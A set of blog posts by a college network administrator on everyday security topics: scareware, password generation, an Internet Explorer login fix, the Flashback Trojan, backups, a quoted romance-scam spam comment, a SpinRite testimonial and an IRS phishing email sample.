Fake antivirus, also known as scareware, rogue antivirus and scamware, is one of most common threats you will encounter on the web today. You’ve probably seen it before, and if you’re smart, you didn’t fall for the scam. The tactic this junk uses is to lure users to malicious sites and then scare them with fake threat warnings in an attempt to get them to pay for fake – and useless – threat removal tools.
Unfortunately the tactics these criminals use are highly effective against the average user who doesn’t know any better; this is why the scams are so prevalent – they make a tremendous amount of money for the criminals. For this reason, they are not going to go away any time soon and you need to know everything you can about how to keep this threat off of your network and away from your users.
Sophos has released a white paper entitled “Stopping Fake Antivirus: How to Keep Scareware off Your Network.” It contains a wealth of information and tips on how to combat this threat. I highly recommend your download and read it.
I immediately downloaded it and checked it out. I’m impressed. This will save me hours of work coming up with my own campaign and presentation for our employee Lunch-n-Learns.
One of the things I really like about this campaign is the each email tip links to a short video on the topic. Here’s the first one in the series, “Don’t Get Tricked:”
[kml_flashembed movie="http://www.youtube.com/v/rLO4EKvJbEM" width="425" height="350" wmode="transparent" /]
I highly recommend you check this out.
I love crossword puzzles. I’ve been doing them my whole life. My wife loves Sudoku puzzles. I can beat her any day at crossword; she slaughters me at Sudoku. This lead me to an interesting realization about passwords: People tend to remember things they have an affinity for. Corollary: People are competent using tools they understand.
So, using crossword as an example, why not use one as a password generation matrix? You could fill it in with random characters, or you could solve the puzzle (in pencil, of course) and then randomly substitute numerals, upper/lower case letters and symbols.
Take a highliter and mark off an 8, 10 or 12 character password. Make it 16 characters if that makes you feel better. When you are done using that password, mark it out in red ink and highlight another one. Use your imagination. Think. Get creative. Fill in those boxes with whatever comes to mind.
(Note: Someone recently told me that they had searched the web and found that I write a lot about passwords. I asked them if they had read any of the articles. They had not. I asked why. They told me that they had their own system and didn’t need to read about it. I asked them about their “system.” I won’t tell you what they told me. I write about this subject a lot in the hope that someday, maybe, someone will realize that passwords can be fun and will start doing fun things to generate secure passwords…)
A client called today saying that his remote login quit working on his laptop. When he would type in the URL of the Remote Web Workspace login for Microsoft Small Business Server 2011, he would get the dreaded “Internet Explorer cannot display the web page” message. I tried every suggestion that Microsoft had come up with:
- Delete browsing history
- Reset IE to defaults
- Edit two different registry keys
- Clear SSL cache
- Delete and re-add certificate
- Flush DNS
- Check HOSTS file
- Check DNS settings
- Disable Add-ons
- Set Advanced settings to prompt for any active content
Nothing worked. I even upgraded to IE9 and reset it. No joy there, either. So we got another fellow on the line from the company who had recently migrated my client’s server to the cloud to see if it could be related to going virtual. He basically ran down the list with me and verified that nothing worked.
We kept going back to Trusted Sites because, naturally, we want the lowest possible security settings so everything would be allowed. Logical, right? Well, forget logic. It doesn’t apply here (and sometimes doesn’t in things Microsoft).
We set up a Webex and the other tech started looking around. We went right back to Trusted Sites and looked. Everything looked right; so the tech deleted the URLs from the Trusted Sites list and voila! It was all good. Like I said, forget logic.
Sometimes you just have to do what seems the most counter-intuitive.
Researchers say that infected WordPress sites were the initial attack vector for the Flashback Trojan horse program. Anywhere from 30,000 to 100,000 sites are thought to have been infected during February and early March with 85 percent of the infected machines located in the U.S. According to Kaspersky Lab researchers, the infected sites were rigged with code that silently redirected visitors to a malicious server.
The vulnerability that Flashback exploits is a known vulnerability in Java. Apple has issued a patch and Kaspersky has an online detection and removal tool available.
According to Dark Reading, This is a good example of why Mac users are an APT (Advanced Persistent Threat) attacker’s dream come true:
[Mac users might not have a lot of exploits to worry about, but their lack of security worries makes them an APT attacker's dream come true. See Anatomy Of A Mac APT Attack. ]
At the college where I am Net Admin, we have posted notices to all Mac users to protect themselves against this threat. We have also patched our 75+ iMacs in the Graphics Design and Photography labs.
With the growing popularity of Macs in the enterprise and with many consumers moving to “all Apple” technology — probably spurred on by the popularity of the iPhone and iPad — it’s no surprise that attackers have begun to zero in on the Mac.
Today, March 31st, is World Backup Day 2012. The tagline reads: “Don’t be an April Fool. Backup your files. Check your restores.” You can visit the site for some great deals on backup services. They have a list of featured articles all about backup and a link to a great infographic on Pinterest. To save you time, I’ve placed the infographic below this post.
Hostgator’s monthly newsletter makes a good point: “Our whole lives are found on our hard drives. When a hard drive fails and the data isn’t backed up, it’s gone. And it’s not a question of IF your drive will fail, it’s WHEN.”
Those of us in the know, who do back up our data on a regular basis are fairly well versed in some of the scary statistics about data loss and data security. For those who aren’t as familiar with the stats, here are the main ones in favor of backups:
- All hard drives will crash during their lifetime
- More than 1 in 10 laptops will be stolen in their lifetime
- A laptop is stolen every 53 seconds
- Every year 46% of computer users lose their music, photos, and documents
- 50% of all hard drives will crash within 5 years
- 89.1% of PC users don’t perform regular backups
- A recent study from Gartner, Inc., found that 90 percent of companies that experience data loss go out of business within two years.
- 70 percent of companies go out of business after a major data loss
While it’s on your mind, go ahead and take advantage of one of the free backup offers commemorating World Backup Day 2012. I promise, you’ll rest easier tonight.
I have been getting a deluge of spam comments to my various posts on this blog from a one Glory Johnson who goes by various nicknames. The most common nickname is “Glory39,” but the number is a moving target; “she” has posted as Glory342, Glory50, Glory34, and Glory38 among others. Well over 50 comments just today and they are still coming in. This is obviously a come-on for a scam, I’m just not sure what kind. I doubt that “Glory Johnson” is actually a female, nor does she have amorous intentions.
See what you think about the text of the comments. They are all identical, regardless of which version of “Glory” is posting them:
Hello My name is glory johnson i saw your profile today techtarget.com) and became intrested in you,i will also like to know you the more,and i want you to send an email to my email address so i can give you my picture for you to know whom i am.Here is my email address ( gloryjohnson001 at yahoo.com) I believe we can move from here!I am waiting for your mail to my email address above. glory. (Remeber the distance or colour does not matter but love matters alot in life) please contact me here ( gloryjohnson001 at yahoo.com)
I decided to play along and use one of my anonymous email addresses to appear to take the bait. Here’s what I sent to “her” email address:
Subject: I will like to know you the more
8:09 PM (16 minutes ago)
You sent me this. I am wanting picture.
My name is glory johnson
i saw your profile today(techtarget.com) and
became intrested in you,i will also like to know you the more,and i
want you to send an email to my email address so i can give you my picture for you to know whom i am.Here is my email address (firstname.lastname@example.org)
I believe we can move from here!I am waiting for your mail to my email address above.
(Remeber the distance or colour does not matter but love matters alot in life)
please contact me here (email@example.com)
Unless this post has just tipped off the scammers, I’ll keep you posted on what transpires.
Part of data security is protecting the storage media from damage and maintaining a high level of data integrity. For hard drive maintenance and recovery, there is no better tool than SpinRite, developed by Steve Gibson of GRC.com. I recently had a great experience with it at Antonelli College where I am the network administrator, so I told Steve about it. While listening to Security Now! Episode 345, I was surprised and delighted to hear Steve read my story. Here’s the excerpt:
Steve: And I heard from a listener, Ken Harthun, who wrote to me on the 19th of February: “SpinRite saves a student’s laptop.” He said, “Steve, I’m a loyal listener of Security Now!, having listened to every single episode. That first episode was only 18 minutes and left me wanting more.” Well, we’ve taken care of that.
Leo: Was it that short? Wow.
Steve: Wow. And that was your original concept, Leo, was just to do sort of a check-in on the week. It’s like, okay, well, that didn’t last long. And it’s funny, too, because I remember Elaine quoting me for transcription, didn’t sound like it was going to be very expensive, either.
Leo: No, sorry about that. Whoops.
Steve: Oh, it’s been worthwhile, and I haven’t looked back.
Leo: Thank you.
Steve: So he said, “Today’s episode was a little over two hours and still left me wanting more. You are often the source and inspiration for my Security Corner blog posts over at IT Knowledge Exchange. So a big geek thank you to you and Leo. Please continue.” He says, “I first used SpinRite in 1999 – it was v5.0 – to recover a floppy disk that had been corrupted. Since that day I’ve insisted that wherever I worked, the IT department agreed to make SpinRite available to me should the need arise, and too often it has. In my private service world, I always insist that, if SpinRite recovers the drive for my client, that my client purchase a copy. Needless to say, there have been a few sales as a result.”
Leo: That’s good idea. That’s a good way to do it.
Steve: I have no problem with that, yeah. He says, “I have my own copy, of course, and last summer I insisted that my new employer, Antonelli College, where I am the network administrator, purchase a site license. Well, that’s a good thing because last week it saved one of their students’ laptops and all of her interior design coursework. Windows was throwing all kinds of errors. The wireless wouldn’t connect. She gave me a list of seemingly random errors that didn’t seem to make a whole lot of sense. But they pointed toward a hard drive failure. I was about to attempt to backup the data and restore the system when it just completely locked up, and I had to force a shutdown with the power button. On restart it just hung at the starting Windows screen and would go no further. I could hear the drive thrashing about. Not good.
“Enter SpinRite. I booted up from my thumb drive and ran it at Level 2. After a couple of hours SpinRite reported that it was finished, though no errors or bad sectors were found,” which of course is a story we’ve heard many times. And I’ve explained why that doesn’t mean SpinRite didn’t do anything. He says, “On reboot, the system came right up, faster than ever, connected to the wireless, and immediately began downloading updates. I completed the updates, ran a few tests, and pronounced the patient healthy. Needless to say, the student was ecstatic. And thanks to SpinRite, I did my part to provide a ‘superior student experience.’” He says, “Part of our vision statement for the campus.” He said, “Steve, SpinRite is absolutely the best hard drive maintenance and recovery utility on the planet, and maybe in the universe. It’s worth 10 times the price you charge for it. Thanks for all you do. Ken Harthun.”
And he said, “P.S.: I’ve never had a hard drive failure, and I attribute that to my using SpinRite on my own systems on a regular basis.” And of course we understand also why it is a good preventive maintenance utility. Running it on a drive, even a quick Level 1, shows the drive where it’s got problems developing that it’s able to correct before they get critical.
It’s that time of the year again and while this particular fake notice has been around before, the frequency seems to peak around tax time in the U.S. It’s a wonder the ploy even works because the IRS NEVER communicates with taxpayers via email. Nevertheless, people fall for it and find themselves infected with malware. Of course, if you are not in the U.S. this one is easy to spot, since the IRS would have no business with you in the first place.
The message comes with one of these subject lines:
Rejection of your tax appeal.
Your tax return appeal is declined.
IRS notification of your tax appeal status.
I’ve seen other variations in the past, but the above are the most common ones.
The text of a typical message is shown below. Variations are common, but generally don’t stray far from this example:
Dear Business owner,
Hereby you are notified that your Income Tax Refund Appeal id#6636527 has been DECLINED. If you believe the IRS did not properly estimate your case due to a misunderstanding of the facts, be prepared to provide additional information. You can obtain the rejection details and re-submit your appeal by using the instructions in the attachment.
Internal Revenue Service
Of course, the attachment is malware and anyone clicking the link will be immediately infected. Sophos detects is as Mal/Iframe-AE.
So you don’t have to surf away from here, here is the video.
[kml_flashembed movie="http://www.youtube.com/v/VTLA-LSJAcc" width="425" height="350" wmode="transparent" /]